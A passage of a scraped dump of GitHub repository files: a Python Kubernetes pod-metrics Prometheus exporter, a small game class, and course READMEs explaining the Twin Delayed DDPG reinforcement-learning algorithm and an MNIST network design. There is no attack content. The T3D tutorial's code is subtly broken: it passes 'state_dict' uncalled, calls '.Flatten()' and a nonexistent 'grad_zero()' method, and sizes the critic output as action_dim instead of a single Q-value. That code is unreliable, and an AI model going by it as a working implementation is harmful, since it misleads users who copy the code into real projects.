"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "from .connectz import *\n\n\n\n"
}
] | 7 |
CallMePIGGY/pod_exporter | https://github.com/CallMePIGGY/pod_exporter | ea8b6e72e22d3df91dc79befffcae0c8dd3e801c | fc426ee603b94bf17c5b7203475d04ef53cceedd | a798cbdb6fc91a54b709c6e7b3953e1e25036895 | refs/heads/master | 2020-04-15T20:58:37.927159 | 2019-01-15T14:16:47 | 2019-01-15T14:16:47 | 165,016,396 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6236842274665833,
"alphanum_fraction": 0.6236842274665833,
"avg_line_length": 29.079999923706055,
"blob_id": "88622160afbd8377efb54b3bec1b9e8e3e605b22",
"content_id": "9e4553ac6e0ade880f9c68248a21ccd797cb77bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 760,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 25,
"path": "/pod_exporter/stats.py",
"repo_name": "CallMePIGGY/pod_exporter",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self, name, cpu, availableMemory, workingSetMemory):\n self.name = name\n self.cpu = cpu\n self.availableMemory = availableMemory\n self.workingSetMemory = workingSetMemory\n\nclass Pod:\n def __init__(self, name, namespace, cpu, workingSetMemory, containers):\n self.name = name\n self.namespace = namespace\n self.cpu = cpu\n self.workingSetMemory = workingSetMemory\n self.containers = containers\n\nclass Container:\n def __init__(self, name, cpu, workingSetMemory):\n self.name = name\n self.cpu = cpu\n self.workingSetMemory = workingSetMemory\n\nclass Stats:\n def __init__(self, node, pods):\n self.node = node\n self.pods = pods\n "
},
{
"alpha_fraction": 0.6155560612678528,
"alphanum_fraction": 0.6293737292289734,
"avg_line_length": 46.22105407714844,
"blob_id": "7c9b170977343bfdf04d15b59fd73f9019c18e46",
"content_id": "43064f6f688cf25516cef0374132686cd942734c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4487,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 95,
"path": "/pod_exporter/pod_exporter.py",
"repo_name": "CallMePIGGY/pod_exporter",
"src_encoding": "UTF-8",
"text": "from urllib.request import urlopen\nfrom stats import Node\nfrom stats import Pod\nfrom stats import Container\nfrom stats import Stats\nimport json\nimport asyncio\nimport prometheus_client as prom\nimport logging\n\ndef getMetrics(url):\n # Get the dataset\n try:\n response = urlopen(url)\n except Exception:\n print('Access 10255 Port Failure.')\n else:\n # Convert bytes to string type and string type to dict\n string = response.read().decode('utf-8')\n json_obj = json.loads(string)\n node = Node('','','', '')\n node.name = json_obj['node']['nodeName']\n node.cpu = json_obj['node']['cpu']['usageCoreNanoSeconds'] / 1000000000\n node.availableMemory = json_obj['node']['memory']['availableBytes']\n node.workingSetMemory = json_obj['node']['memory']['workingSetBytes']\n\n pods_array = json_obj['pods']\n\n pods_list = []\n\n for p_item in pods_array:\n pod = Pod('','','','','')\n pod.name = p_item['podRef']['name']\n pod.namespace = p_item['podRef']['namespace']\n pod.cpu = p_item['cpu']['usageCoreNanoSeconds'] / 1000000000\n pod.workingSetMemory = p_item['memory']['workingSetBytes']\n containers_array = p_item['containers']\n containers_list = []\n for c_item in containers_array:\n container = Container('','','')\n container.name = c_item['name']\n container.cpu = c_item['cpu']['usageCoreNanoSeconds'] / 1000000000\n container.workingSetMemory = c_item['memory']['workingSetBytes']\n containers_list.append(container)\n pod.containers = containers_list\n pods_list.append(pod)\n\n stats = Stats('','')\n stats.node = node\n stats.pods = pods_list\n return stats\n\n\nformat = \"%(asctime)s - %(levelname)s [%(name)s] %(threadName)s %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=format)\n\ng1 = prom.Gauge('node_cpu_usage_seconds_total', 'CPU useage of the node', labelnames=['node_name'])\ng2 = prom.Gauge('node_memory_available_bytes', 'Memory available of the node', labelnames=['node_name'])\ng3 = prom.Gauge('node_memory_usage_bytes', 'Memory useage of the node', labelnames=['node_name'])\ng4 = prom.Gauge('pod_cpu_usage_seconds_total', 'CPU useage of the node', labelnames=['namespace', 'pod_name'])\ng5 = prom.Gauge('pod_memory_usage_bytes', 'Memory useage of the node', labelnames=['namespace', 'pod_name'])\ng6 = prom.Gauge('container_cpu_usage_seconds_total', 'CPU useage of the node', labelnames=['namespace', 'pod_name','container_name'])\ng7 = prom.Gauge('container_memory_usage_bytes', 'Memory useage of the node', labelnames=['namespace', 'pod_name','container_name'])\ng8 = prom.Gauge('kube_pod_container_info', 'Info of the pod', labelnames=['namespace', 'node_name', 'pod_name','container_name'])\n\nasync def expose_stats(url):\n while True:\n stats = getMetrics(url)\n if type(stats) == Stats:\n logging.info(\"nodename: {} value {}\".format(stats.node.name, stats.node.cpu))\n g1.labels(node_name=stats.node.name).set(stats.node.cpu)\n g2.labels(node_name=stats.node.name).set(stats.node.availableMemory)\n g3.labels(node_name=stats.node.name).set(stats.node.workingSetMemory)\n pods_array = stats.pods\n for p_item in pods_array:\n g4.labels(namespace=p_item.namespace, pod_name=p_item.name).set(p_item.cpu)\n g5.labels(namespace=p_item.namespace, pod_name=p_item.name).set(p_item.workingSetMemory)\n containers_array = p_item.containers\n for c_item in containers_array:\n g6.labels(namespace=p_item.namespace, pod_name=p_item.name, container_name=c_item.name).set(c_item.cpu)\n g7.labels(namespace=p_item.namespace, pod_name=p_item.name, container_name=c_item.name).set(c_item.workingSetMemory)\n g8.labels(namespace=p_item.namespace, node_name=stats.node.name, pod_name=p_item.name, container_name=c_item.name)\n await asyncio.sleep(1)\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n # Start up the server to expose metrics.\n prom.start_http_server(9183)\n url = 'http://localhost:10255/stats/summary'\n tasks = [loop.create_task(expose_stats(url))]\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n loop.close()\n\n"
}
] | 2 |
Minimalistic-Jaybird/ASCII-Game | https://github.com/Minimalistic-Jaybird/ASCII-Game | 0949c1c6b387155cf688758da2f0120c1e6b890c | 330f14f64ad85749047b0f27a08623ac300872f8 | 14f34b514a765651dd42130d85f17a752e561bdd | refs/heads/master | 2020-07-11T11:40:35.299601 | 2019-09-13T03:09:26 | 2019-09-13T03:09:26 | 204,530,150 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6172839403152466,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 39.66666793823242,
"blob_id": "7c4752ed8ddb1ac7c05e777aee8e4c9b2bbc0e23",
"content_id": "6e75a428e0ed0aa1cf3570fe36ec7fa399568a6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 6,
"path": "/components/equippable.py",
"repo_name": "Minimalistic-Jaybird/ASCII-Game",
"src_encoding": "UTF-8",
"text": "class Equippable:\n def __init__(self, slot, power_bonus=0, defence_bonus=0, max_hp_bonus=0):\n self.slot = slot\n self.power_bonus = power_bonus\n self.defence_bonus = defence_bonus\n self.max_hp_bonus = max_hp_bonus"
}
] | 1 |
ashxjain/eva | https://github.com/ashxjain/eva | 87de0b53734794d2036ec27f0fa6aae114ec968d | 3d2e79712f4bb0a3d77d2d187cf227c873cb6e2c | c117cde4b5420bc4dd6f56c3661daa11cb70008c | refs/heads/master | 2023-01-27T13:21:59.598931 | 2020-12-05T19:40:01 | 2020-12-05T19:40:01 | 184,571,520 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.686059832572937,
"alphanum_fraction": 0.6970975995063782,
"avg_line_length": 50.56235885620117,
"blob_id": "c9fa75cf4eac198a6cba6de8deccd7287b9ac48d",
"content_id": "b89e35aeca5867e6b63d4729267767ea2baae7bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22743,
"license_type": "no_license",
"max_line_length": 515,
"num_lines": 441,
"path": "/P2_S9/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# Understanding Implementation Of Twin Delayed DDPG (T3D)\n\nT3D is a reinforcement learning model, based on [Asynchronous Advantage Actor-Critic Algorithm](https://arxiv.org/pdf/1602.01783.pdf) (A3C). But before we understand and implement T3D, let's get a quick understanding of what is reinforcement learning, what is A3C model and why to use A3C based models.\n\nIn reinforcement learning, an agent/program is continuously learning from its environment. It learns on what to do, how to map situations to actions with the aim to maximize rewards it acheive by performing right actions for particular situations.\n\nAs we all know about the Q equation derived from famous Bellman Equation, which is the basis for reinforcement learning:\n\n\n\nSo in above equation:\n\n* Q (s, a) = Q-value of being in state (s) and reaching state (s') by taking an action (a)\n* R (s, a) = Reward you get after taking that action and reaching state (s') from state (s)\n* γ (gamma) = the discounting factor (a hyperparameter), to balance the immediate reward and future reward\n* Q<sub>max</sub> (s', a') = max Q value across all actions (a') taken from state (s')\n\nQ-value can be considered as a value associated with a specific action. Max of multiple Q-values for multiple actions is what is considered as action for the agent.\n\nFor solving complex problems, we use a Deep Q Network (DQN), to predict Q-values as opposed to using a value table based model.\n\nA DQN takes in state as input and outputs Q values for all possible actions.\n\n\n\nSince there are discrete number of actions, it will not work for continuous action spaces. For example, it works fine if say a car's action is to move 5 degrees left or right or no movement at all. But if it has be a range like -5 to +5 degrees, then this will not work. Hence comes in A3C models.\n\n\n\nA3C models is an extension to DQN model, where we have two models: Actor & Critic.\n\nActor is trying to predict an action based on the current state (policy network), and critic is trying to predict the V-Values (max Q-Values) given the state and actions. Critic model ensures that the actor model takes right action as part of training process. To make it work for continuous action spaces, the value of actor model (max output) is actually used for training. This value defines the action value. More details on why actor-critic model and its training aspects is covered as part of T3D explanation.\n\nIn T3D, twin stands for \"2 Critic models\", hence here we have 1 Actor, 2 Critic models.\n\n\n\nTwo critic models gives stability to our network. More explanation on this and how it is trained is covered step-by-step with actual implementation.\n\n## Step 1: Initialization\n\nImport all the required libraries. A note on few important libraries:\n\n* [https://pytorch.org](https://pytorch.org): We use PyTorch for our neural network implementation\n* [Gym](https://gym.openai.com): This provides a variety of environments like Atari, MuJoCo, etc for our reinforcement learning experiments\n* [https://github.com/benelot/pybullet-gym](https://github.com/benelot/pybullet-gym): Library providing physics based environment for our experiment\n\n```python\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pybullet_envs\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom gym import wrappers\nfrom torch.autograd import Variable\nfrom collections import deque\n```\n\n## Step 2: Define Replay Memory\n\n* This is a fixed size array storing multiple experiences.\n\n* An experience (aka transition) is defined by the following:\n * s: current state in which the agent is\n * a: action the agent takes to go to next state\n * s': new state agent reaches after taking an action (a)\n * r: reward an agent receive for going from state (s) to state (s') by taking action (a)\n \n* Initially, agent plays with the environment randomly and fills in replay memory.\n\n* Then during training, a batch of experiences is sampled randomly to train the agent.\n\n* Also this memory is simultaneously filled as and when agent explores the environment.\n\n* If memory is full, then first entry is removed and new entry is added.\n \n \n \n* Replay memory size is usually initialised to a large number, in our case 1 Million, so that agent can learn from variety of experiences\n\n```python\nclass ReplayBuffer(object):\n def __init__(self, max_size = 1e6):\n self.storage = []\n self.max_size = max_size\n self.ptr = 0\n\n def add(self, transition):\n if len(self.storage) == self.max_size:\n self.storage[int(self.ptr)] = transition\n self.ptr = (self.ptr + 1) % self.max_size\n else:\n self.storage.append(transition)\n \n def sample(self, batch_size):\n ind = np.random.randint(0, len(self.storage), batch_size)\n batch_states, batch_next_states, batch_actions, batch_rewards, \\\n batch_dones = [], [], [], [], []\n for i in ind:\n state, next_state, action, reward, done = self.storage[i]\n batch_states.append(np.array(state, copy = False))\n batch_next_states.append(np.array(next_state, copy = False))\n batch_actions.append(np.array(action, copy = False))\n batch_rewards.append(np.array(reward, copy = False))\n batch_dones.append(np.array(done, copy = False))\n return np.array(batch_states), np.array(batch_next_states), \\\n np.array(batch_actions), np.array(batch_rewards).reshape(-1, 1), \\\n np.array(batch_dones).reshape(-1, 1)\n```\n\n* Above we define a `sample` function, as during training this becomes our dataset. Here we randomly sample a **batch** of experiences and use that as model inputs and for loss calculations.\n\n## Step 3: Define Actor-Critic Models\n\n* Following defines our network model for Actor & Critic. It is a simple dense network, with RELU used as activation layer.\n* For Actor model, our input is state and output is actions. Hence we specify `state_dims` and `action_dim` in below code.\n* **Note:** `max_action` is used to clamp the action value in case we add too much gaussian noise. More on this is explained further. So to limit the output in `-max_action` to `+max_action` range, we use `tanh` to confine the network to `-1` to `+1` range and then multiply it with `max_action`, thereby getting our output in the required range.\n\n```python\nclass Actor(nn.Module):\n def __init__(self, state_dims, action_dim, max_action):\n # max_action is to clip in case we added too much noise\n super(Actor, self).__init__() # activate the inheritance\n self.layer_1 = nn.Linear(state_dims, 400)\n self.layer_2 = nn.Linear(400, 300)\n self.layer_3 = nn.Linear(300, action_dim)\n self.max_action = max_action\n \n def forward(self, x):\n x = F.relu(self.layer_1(x))\n x = F.relu(self.layer_2(x))\n x = self.max_action * torch.tanh(self.layer_3(x))\n return x\n```\n\n* For Critic model, since we need two models, we are definining them in same class but with different output variables. This way it is easy for us to write and maintain the code.\n* Here, our input is state and action, hence we pass both `state_dims` & `action_dim` as part of initialisation. During training, input to this model is concatenation of both state and action.\n* **Note:** we also define a separate network Q1, which is actually same as first critic network. This is used for loss calculation and updating weights of Actor model. More on this is covered in following steps.\n\n```python\nclass Critic(nn.Module):\n def __init__(self, state_dims, action_dim):\n super(Critic, self).__init__() # activate the inheritance\n # First Critic Network\n self.layer_1 = nn.Linear(state_dims + action_dim, 400)\n self.layer_2 = nn.Linear(400, 300)\n self.layer_3 = nn.Linear(300, action_dim)\n # Second Critic Network\n self.layer_4 = nn.Linear(state_dims + action_dim, 400)\n self.layer_5 = nn.Linear(400, 300)\n self.layer_6 = nn.Linear(300, action_dim)\n \n def forward(self, x, u): # x - state, u - action\n xu = torch.cat([x, u], 1) # 1 for vrtcl concatenation, 0 for Hzntl\n # forward propagation on first critic\n x1 = F.relu(self.layer_1(xu))\n x1 = F.relu(self.layer_2(x1))\n x1 = self.layer_3(x1)\n # forward propagation on second critic\n x2 = F.relu(self.layer_4(xu))\n x2 = F.relu(self.layer_5(x2))\n x2 = self.layer_6(x2)\n return x1, x2\n \n def Q1(self, x, u): # x - state, u - action\n # This is used for updating the Q values\n xu = torch.cat([x, u], 1) # 1 for vrtcl concatenation, 0 for Hzntl\n x1 = F.relu(self.layer_1(xu))\n x1 = F.relu(self.layer_2(x1))\n x1 = self.layer_3(x1)\n return x1\n```\n\n* **Device selection:** If our model is trained on CPU, then below code should take care of setting `device='cpu'`, similarly for GPU. That way we can write our code without specifically mentioning a particular device.\n\n```python\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n```\n\n\n\n ## Training our model\n\n\n\n## Step 4: Training Initializations\n\n* Our whole training process is built in a class. In this class, as part of `__init__`, we initialize the following networks:\n \n* As part of initialization, Actor Target model weights are same as Actor model. Similary Critic Target models weight are same as correspoding Critic models.\n\n```python\nclass T3D(object):\n def __init__(self, state_dims, action_dim, max_action):\n # making sure our T3D class can work with any env\n self.actor = Actor(state_dims, action_dim, max_action).to(device)\n self.actor_target = Actor(state_dims, action_dim, max_action).to(device)\n \n # initializing with model weights to keep the same\n self.actor_target.load_state_dict(self.actor.state_dict)\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters())\n self.max_action = max_action\n\n self.critic = Critic(state_dims, action_dim).to(device)\n self.critic_target = Critic(state_dims, action_dim).to(device)\n \n # initializing with model weights to keep the same\n self.critic_target.load_state_dict(self.critic.state_dict)\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters())\n```\n## Step 5: Action Selection\n* In every training iteration, as and when we sample batch of experiences from replay memory, our agent needs to take an action during that iteration. This is part of online training. The action which agent takes is selected by calling `select_action`. Agent's current state is passed to Actor model to get next action. This way agent is getting trained as well simultaneously performing action.\n```python\n def select_action(self, state):\n state = torch.Tensor(state.reshape(1, -1)).to(device)\n # need to convert to numpy, for clipping\n return self.actor(state).cpu().data.numpy().Flatten()\n```\n## Step 6: Train Method\n* Train method is defined with following arguments:\n * replay_buffer: This is the replay memory in which we are storing the experiences\n * iterations: Number of iterations to train the network\n * batch_size: Number of experiences to be sampled from replay memory\n * discount: Discounting factor used for calculating target Q-value which will be used for loss calculations\n * tau: Hyperparameter used to update weights of target network from model network using Polyak Averaging\n * policy_noise: Noise added to Actor Target output, when passed to Critic Target networks. This way we achieve exploration\n * noise_clip: Clips the policy_noise to maintain it in a specific range\n * policy_freq: Because the target network weights and Actor model weight updation is delayed, we define this parameter to control when to update the weights. If 2, then after every two iterations.\n* First step in training is to randomly sample batch of experiences from replay memory.\n* **Note:** the environment also provides `done` variable to indicate if an episode is done or not.\n\n```python\ndef train(self, replay_buffer, iterations, batch_size=100, discount=0.99,\n tau = 0.005, policy_noise=0.2, noise_clip=0.5, policy_freq=2):\n for it in range(iterations):\n # Sample from a batch of transitions (s, s', a, r) from the memory\n batch_states, batch_next_states, batch_actions, batch_rewards, batch_dones \\\n = replay_buffer.sample(batch_size)\n state = torch.Tensor(batch_states).to(device)\n next_state = torch.Tensor(batch_next_states).to(device)\n action = torch.Tensor(batch_actions).to(device)\n reward = torch.Tensor(batch_rewards).to(device)\n done = torch.Tensor(batch_dones).to(device)\n```\n## Step 7: Perform Action In The Environment\n\nActor network predicts next action for the agent to take from current state. This is the step agent performs in the environment and is visible on the game/environment screen. And the resulting state and reward is all stored as a new experience in the replay memory. This step is just to proceed the agent in the game/environment and to add entry in the replay memory.\n\n## Step 8: Train Actor Network \n\n- The main aim is to train Actor network as it provides next action to be performed in the environment.\n\n- But to train actor network, we first need to get output from Critic network and hence we must first train Critic network. And Critic network is trained by Critic Target network, which in turn needs output from Actor Target network. So let's break this down and first see how to train Critic Network\n\n \n\n## Step 7: Training Critic Network\n\nCritic network takes in (s, a) from the batch. And outputs Q-value.\n\nFor loss calculation we first need to find target Q-value. And that is calculated using Bellman's equation:\n\n\n\n\n\n##### Step 7.1: Calculating target Q-Value\n\nSo, we need the following to calculate target Q-value:\n\n* R (s, a): reward for taking action (a) from current state (s), we have this value from our batch entry (experience)\n* γ (gamma): Discounting factor is already passed as input, defined as hyperparameter\n* Q<sub>max</sub> (s', a'): This is the Q-value for next state (a') by performing next action (a'). To find this Q-value of a future state, we need target network. Because we know neural networks are good approximaters, we can use the same model for next state Q calculations\n\n* We already have `R(s,a), γ , s'` , but we need next action (a') to be performed from state (s')\n\n##### Step 7.1.1: Next Action (a')\n\n* We get next action from our Actor Target network:\n\n```python\n # From the next state s', the actor target plays the next action a'\n next_action = self.actor_target.forward(next_state)\n```\n##### Step 7.1.2: Add Gaussian Noise To Next Action (a')\n\n* We add Gaussian noise to next action (a') and clamp it between `-max_action` to `+max_action`.\n* This allows our agent to explore the environment and learn better.\n```python\n # We add Gaussian noise to this next action a' and\n # we clamp it in a range of values supported by the environment\n noise = torch.Tensor(next_action).data.normal_(0, policy_noise).to(device)\n noise = noise.clamp(-noise_clip, noise_clip)\n next_action = (next_action + noise).clamp(-self.max_action, self.max_action)\n```\n##### Step 7.1.3: Fetch Q-Values From Both Critic Target Networks\n\n* So we pass (s', a') to Critic Target network and get the required Q value for target Q value calculations.\n* But using a single Critic Target network's output, makes model too optimistic. And hence we use another Critic Target network, and take the minimum of both of the networks. So that we are not too optimistic with the Q-value, and it gives network enough time to learn Q-values and hence adds stability.\n* Hence our target Q-value formula will now be: `Qt = r + gamma * min(Qt1, Qt2).`\n```python\n # The two Critic targets take each the couple (s', a')\n # as input and return two Q values, Qt1(s', a') and\n # Qt2(s', a') as outputs\n target_Q1, target_Q2 = self.critic_target.forward(next_state, next_action)\n \n # Keep the minimum of these two Q-Values\n target_Q = torch.min(target_Q1, target_Q2)\n```\n* Now that we have this Q-value from Critic Target Network, we calculate our final target Q-Value.\n* **Note:** That we are only supposed to run this if the episode is over, which means we need to integrate `done` here. Also, we must detach target Q-Value as it would create it's own computation graph without detaching Qt1/Qt2 from their own graph and hence complicating things.\n```python\n target_Q = reward + ((1-done) * discount * target_Q).detach()\n```\n##### Step 7.2: Predicting Q-Values from Critic Network\n\n* Now that we have target Q-Value, let's get predicted Q-values from both the Critic networks and calculate critic loss.\n* Critic Loss is combined mean squared loss (MSE) of Q-value from critic network 1 and target-Q & MSE of Q-value from critic network 2 and target-Q.\n\n```python\n # Two critic models take (s, a) as input and return two Q-Vales\n current_Q1, current_Q2 = self.critic.forward(state, action)\n \n # Compute the critic loss\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n```\n* We now backpropagte and update Critic Network weights.\n```python\n # Backpropagate this critic loss and update the parameters\n # of two Critic models with an Adam optimizer\n self.critic_optimizer.zero_grad() # initializing the gradients to zero\n critic_loss.backward() # computing the gradients\n self.critic_optimizer.step() # performing weight updates\n```\n## Step 8: Actor Network Backpropagation\n\n* Now that we have Critic network updated with new weights. Once in every policy_freq (=2) iteration, we update Actor network weights.\n\n \n\n* Actor network uses Critic network 1 (Q1)'s output for loss calculation. This loss is maximized using Gradient Ascent. We maximize loss here because we want to maximize Q-value and max Q-value is the action taken by the agent.\n\n```python\n # Once every two iterations, we update our Actor model by performing\n # gradient ASCENT on the output of the first Critic model\n if it % policy_freq == 0:\n # This is DPG part\n actor_loss = -(self.critic.Q1(state, self.actor(state)).mean())\n self.actor_optimizer.grad_zero()\n actor_loss.backward()\n self.actor_optimizer.step()\n```\n## Step 9: Target Networks Weights Updation\n\n* Once the actor network weights are updated, after next two iterations, target networks' weights are updated from their corresponding model networks using Polyak Averaging.\n\n \n\n* **Polyak Averaging:** The essence of this equation is to take little of new weights and keep most of old weights. Tau is a very small number.\n\n \n\n* Above equation can be rewritten as:\n W<sub>new</sub> = (tau) W<sub>in</sub> + (1 - tau) W<sub>old </sub>\n\n* **Note:** above W is actual weights and not delta of weights.\n\n* Here we are biased on old weights and expecting new weights to come in continously and take the network in right direction.\n\n```python\n # Once in every two iterations, we update our Actor Target\n # by Polyak Averaging\n for param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data)\n \n # Once in every two iterations, we update our Critic Target\n # by Polyak Averaging\n for param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data)\n```\n\nThis is one iteration. We'll perform multiple iterations until we finish an episode or reach the end of iterations count.\n\n## Summary\n\nHere's a summary in terms of first 4 iterations:\n\n**Iteration-1:**\n\n1. Select Action:\n * Agent is started with initial state `s`\n * Agent selects new action using **Actor Network** : `s -> [Actor] -> a` \n * Agent reaches new state `s'` after performing action `a`. Also agent receives reward `r` for reaching state `s'`\n * Store `[s, a, s', r]` as experience in replay memory\n2. Randomly sample batch of experiences from replay memory. We'll consider single experience from batch data for understanding: `[s, a, s', r]`\n3. Train both the **Critic Networks**:\n * Predict Q-values:\n * `(s, a) -> [Critic-1] -> Q-v1`\n * `(s, a) -> [Critic-2] -> Q-v2`\n * Calculate Target Q values:\n * Get next-action `a'` from **Target Actor Network**: `s' -> [Actor-Target] -> a'`\n * `(s', a') -> [Critic-1] -> Qt'-v1`\n * `(s', a') -> [Critic-2] -> Qt'-v2`\n * Get target Q-value: `Qt = r + (1-done)*gamma * min(Qt'-v1, Qt'-v2)`\n * Calculate critic loss function, minimize it:\n * `critic_loss = F.mse_loss(Q-v1, Qt) + F.mse_loss(Q-v2, Qt)`\n * Perform backpropagation\n\n**Iteration-2:**\n\n* Follow steps 1-3 as mentioned above.\n\n4. Train **Actor Network**:\n * Calculate actor loss: \n * Get next-action `a'` from **Actor Network**: `s -> [Actor] -> a`\n * Get Q1 value from **Critic Network 1**: `(s, a) -> [Critic-1] -> Q-v1`\n * Actor loss: `actor_loss = -(Q-v1).mean()`\n * Perform backpropagation\n\n**Iteration-3:**\n\n* Follow steps 1-3 as mentioned above.\n\n**Iteration-4:**\n\n* Follow steps 1-4 as mentioned above.\n\n5. Update Target Networks' weight by Polyak Averaging:\n * **Actor Target Network**:\n * Update weights from Actor Network\n * Actor-Target<sub>new</sub> = (tau) Actor<sub>new</sub> + (1 - tau) Actor-Target<sub>old </sub>\n * **Critic Target Network 1**:\n - Update weights from Critic Network 1\n - Critic-Target-1<sub>new</sub> = (tau) Critic-1<sub>new</sub> + (1 - tau) Critic-Target-1<sub>old </sub>\n * **Critic Target Network 2**:\n - Update weights from Critic Network 2\n - Critic-Target-2<sub>new</sub> = (tau) Critic-2<sub>new</sub> + (1 - tau) Critic-Target-2<sub>old </sub>\n\n"
},
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 15.5,
"blob_id": "2f133fdbf6d79a2fbae3ba093232ec9212d2cc7a",
"content_id": "5f973397a1a7bfda17ee1a34bdde38bd59bad762",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# eva\nExtensive Vision AI Course\n"
},
{
"alpha_fraction": 0.6025485396385193,
"alphanum_fraction": 0.6826456189155579,
"avg_line_length": 61.18867874145508,
"blob_id": "9839dd68f449c63fad0e24a527ed9daded30771f",
"content_id": "d08323805ccda494af65ccf108fd03dfdca0c273",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3296,
"license_type": "no_license",
"max_line_length": 369,
"num_lines": 53,
"path": "/P5_S4/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# Architectural Basics\n\n* GROUP MEMBERS:\n * Ashish Jain ([email protected])\n * Samir Prasad ([email protected])\n\n \n \n* We'll start with a base network and see how we improve it and there by learning on how to use different methologies to achieve desired results.\n\n* Base network architecutre:\n```\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, padding=1) # 28x28x1 -> 28x28x32 [Jin=1,K=3,RFin=1] RF: 3, Jout: 1\n self.conv2 = nn.Conv2d(32, 64, 3, padding=1) # -> 28x28x64 [Jin=1,K=3,RFin=3] RF: 5, Jout: 1\n self.pool1 = nn.MaxPool2d(2, 2) # -> 14x14x64 [Jin=1,K=2,RFin=5] RF: 6, Jout: 2\n self.conv3 = nn.Conv2d(64, 128, 3, padding=1) # -> 14x14x128 [Jin=2,K=3,RFin=6] RF: 10, Jout: 2\n self.conv4 = nn.Conv2d(128, 256, 3, padding=1) # -> 14x14x256 [Jin=2,K=3,RFin=10] RF: 14, Jout: 2\n self.pool2 = nn.MaxPool2d(2, 2) # -> 7x7x256 [Jin=2,K=2,RFin=14] RF: 16, Jout: 4\n self.conv5 = nn.Conv2d(256, 512, 3) # -> 5x5x512 [Jin=4,K=3,RFin=16] RF: 24, Jout: 4\n self.conv6 = nn.Conv2d(512, 1024, 3) # -> 3x3x1024 [Jin=4,K=3,RFin=24] RF: 32, Jout: 4\n self.conv7 = nn.Conv2d(1024, 10, 3) # -> 1x1x10 [Jin=4,K=3,RFin=32] RF: 40, Jout: 4\n\n def forward(self, x):\n x = self.pool1(F.relu(self.conv2(F.relu(self.conv1(x)))))\n x = self.pool2(F.relu(self.conv4(F.relu(self.conv3(x)))))\n x = F.relu(self.conv6(F.relu(self.conv5(x))))\n x = F.relu(self.conv7(x))\n x = x.view(-1, 10)\n return F.log_softmax(x)\n\n# Number of Parameters = 6.3M\n# Batch Size = 128\n# 1st epoch Acc = 29%\n```\n\n* As seen above there are lots of parameters for such a simple dataset\n* RELU after last layer is a bad thing to do. On removing RELU, on the same network we achieve 98%!\n* Tried the following to achieve very good results:\n 1. Removed RELU after last layer (reached 98% in first epoch)\n 2. Modified batch size to 64. But no improvement, so reverted back to 128\n 3. Reduced number of parameters to less than 20K\n 4. Refactored network to use `nn.Sequential`, makes code more readable. Also added functions to avoid code duplication\n 5. Added transition block, this makes our architecture `excite and squeeze` network. This makes sense so that network can learn Edge/Gradients/Textures/Pattern/PartsOfObject during excite phase and make sense of it during squeeze phase. Purposefully added bunch of convolution layers after last transition block so that MaxPooling is little far from Prediction layer.\n 6. Added Batch Normalization after every conv layer, except last layer\n 7. With above things, i was able to achieve 99.36% Accuracy at 18th Epoch. Training loss was 0.0036, but test loss was 0.0218. This was clearly overfitting! So tried two things to fix it: Dropout & Image Preprocessing\n 1. Tried Dropout with values 0.1,0.2,etc but it was not performing well\n 2. Tried adding image preprocesing i.e. RandomAffine/ColorJitter. Worked very well! Was able to achieve 99.45% Accuracy at 10th Epoch. And 99.50 at 20th Epoch.\n* My goal was to achieve 99.4% accurach in less than 20 epochs with less than 20K paramters, which i achieved. But there are lot more things we can try to improve the network. For example:\n 1. Better learning rate\n 2. Try different batch size\n"
},
{
"alpha_fraction": 0.7705357074737549,
"alphanum_fraction": 0.7839285731315613,
"avg_line_length": 85.07691955566406,
"blob_id": "d14b7ba1658d3c5e923044a09fb32ccf3e2636eb",
"content_id": "703615ae44084b4e441fe55589694ebc97ffed7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1120,
"license_type": "no_license",
"max_line_length": 324,
"num_lines": 13,
"path": "/P5_S14/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
